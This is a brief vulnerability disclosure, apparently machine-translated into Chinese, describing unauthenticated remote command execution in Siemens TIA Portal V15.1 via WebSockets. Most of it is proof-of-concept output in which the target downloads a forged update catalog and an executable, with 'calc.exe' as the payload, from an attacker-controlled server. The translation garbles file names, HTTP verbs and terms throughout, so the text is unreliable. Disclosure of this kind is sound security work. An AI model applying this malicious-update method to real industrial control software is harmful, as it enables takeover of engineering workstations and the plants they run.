西门子TIA门户(STEP7)远程代码执行

站得住脚的发现了一个漏洞在门户V15.1西门子TIA。脆弱性是一个未经身份验证的远程命令执行漏洞,允许远程攻击者未经身份验证的管理访问所有应用程序的命令。攻击者可以执行应用程序功能在WebSockets协议发送的数据包。以下输出从一个概念证明,触发恶意固件更新任意服务器:

python siemens_rce美元。py启动httpd……10.0.0.134——(08年/ 7月/ 2019 10:47:31)“/ PWRSim / HTTP / 1.1”200 - 10.0.0.134——(08年/ 7月/ 2019 10:47:33)“/ PWRSim PWRControlNet10 HTTP / 1.1”200 - 10.0.0.134——08年/ 7月/ 2019 10:47:39”得到/ PWRSim / PWRControlNet10 / SWM_RollOut_Configuration。xml HTTP / 1.1”200 - 10.0.0.134——08年/ 7月/ 2019 10:47:43”得到/ PWRSim / PWRControlNet10 / UpdatesSummaryCatalog。xml HTTP / 1.1”200 -[+]货代- > Inventory_TIAPORTAL_V15_UPD99编写xml更新。xml 10.0.0.134——(08年/ 7月/ 2019 10:47:47)“/ PWRSim /硅镁质/ tiaportal / SEBU-TIAPORTALUPDATE / 15.1.0.4 / / Inventory_TIAPORTAL_V15_UPD99。xml HTTP / 1.1”200 -[+]写二进制更新货代- > Inventory_TIAPORTAL_V15_UPD99。exe 10.0.0.134——(08年/ 7月/ 2019 10:47:54)“头/ PWRSim /硅镁质/ tiaportal SEBU-TIAPORTALUPDATE / 15.1.0.4 / Inventory_TIAPORTAL_V15_UPD99。exe HTTP / 1.1“200 - 10.0.0.134——08年/ 7月/ 2019 10:47:54”头/ PWRSim /硅镁质/ tiaportal / SEBU-TIAPORTALUPDATE / 15.1.0.4 / Inventory_TIAPORTAL_V15_UPD99。200 - 10.0.0.134 txt HTTP / 1.1”——(08年/ 7月/ 2019 10:48:01)“GET / PWRSim /硅镁质/ tiaportal / SEBU-TIAPORTALUPDATE / 15.1.0.4 / Inventory_TIAPORTAL_V15_UPD99。exe HTTP / 1.1“200 - ?)检查位范围- >得到位范围0 - 4894[+]阅读“calc.exe”,发送部分(寻求- > 0,阅读- > 4894]